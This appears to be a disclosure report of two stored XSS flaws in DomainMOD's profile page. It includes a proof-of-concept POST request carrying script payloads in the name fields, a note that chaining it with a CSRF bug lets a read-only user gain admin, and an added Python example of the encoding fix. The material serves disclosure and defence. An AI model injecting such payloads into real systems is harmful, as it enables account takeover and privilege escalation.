There are two stored XSS vulnerabilities.
A read-only user can use the stored XSS together with the CSRF to add an administrator account, change the read-only user to admin, or change the admin password……
PoC:
After the read-only user logs in:
POST URL: https://demo.domainmod.org/settings/profile/
POST data:
new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F2222%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0
Then the admin logs in and opens the URL https://demo.domainmod.org/admin/users/. The JavaScript will execute. With the CSRF vulnerability (#65), a read-only user can add an administrator account, change the read-only user to admin, or change the admin password……
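The following is an added example, not DomainMOD's own code, showing why the reported profile payload fires when the stored first name is written into an HTML attribute without encoding, and how attribute-context output encoding makes the same stored value inert. The POST body is the one quoted in the report; the template string and the function names are assumptions.

```python
"""Stored XSS in a profile field: unencoded vs. HTML-attribute-encoded rendering."""
from html import escape
from urllib.parse import parse_qs

# POST body exactly as quoted in the report for /settings/profile/
# (sent by the read-only user).
REPORTED_POST_BODY = (
    "new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E"
    "&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F2222%2F%29%3C%2Fscript%3E"
    "&new_email_address=test%40test.com&new_currency=USD"
    "&new_timezone=Canada%2FPacific&new_expiration_emails=0"
)


def stored_profile(post_body: str) -> dict:
    """What the database ends up holding: the form is URL-decoded and saved as-is."""
    fields = parse_qs(post_body, keep_blank_values=True)
    return {
        "first_name": fields["new_first_name"][0],
        "last_name": fields["new_last_name"][0],
    }


# Assumed admin user-list template; DomainMOD's real markup may differ.
ROW_TEMPLATE = '<input type="text" name="first_name" value="{}">'


def render_user_row_vulnerable(profile: dict) -> str:
    """No output encoding: the stored '">' closes the value attribute and the
    <script> element becomes live markup when the admin opens /admin/users/."""
    return ROW_TEMPLATE.format(profile["first_name"])


def render_user_row_fixed(profile: dict) -> str:
    """Attribute-context encoding: quote=True also escapes the double quote, so
    the stored value cannot break out of the attribute and stays plain text."""
    return ROW_TEMPLATE.format(escape(profile["first_name"], quote=True))


def contains_live_script(html: str) -> bool:
    """Demonstration check only: is a raw <script> tag present in the output?"""
    return "<script>" in html.lower()
```

The same encoding has to be applied to every stored field the admin page prints (last name included), since the report shows both fields carry a payload.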